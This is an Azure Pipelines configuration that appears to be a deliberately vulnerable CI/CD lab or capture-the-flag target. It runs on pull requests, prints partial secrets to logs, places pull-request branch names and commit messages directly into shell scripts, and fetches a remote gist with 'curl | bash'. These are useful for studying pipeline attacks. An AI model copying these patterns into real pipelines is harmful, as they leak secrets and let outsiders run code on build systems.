pr:
- main

pool:
  vmImage: ubuntu-latest

variables:
- name: trustedSourceUrl
  value: https://gist.githubusercontent.com/fproulx-boostsecurity/fef312cd7d54b9420b10fd50d0793191/raw/a5f417b88fa2184a9726b274daf18d29da6c79ad/id

steps:
- checkout: self
- script: echo "$(SECRET_FLAG1)" | cut -c-12
  displayName: 'Process SECRET_FLAG1'
- script: echo "$(FLAG2)" | cut -c-5
  displayName: 'Process FLAG2'
- script: |
    echo "Source branch 1: $(Build.SourceBranch)"
    echo "Source branch 2: $(Build.SourceBranchName)"
    echo "Source branch 3: $(System.PullRequest.SourceBranch)"
    echo "Commit message: $(Build.SourceVersionMessage)"
  displayName: 'Process message'
- script: |
    echo "Download URL: $(trustedSourceUrl)"
    curl $(trustedSourceUrl) | bash
- script: bash script.sh
- script: npm install
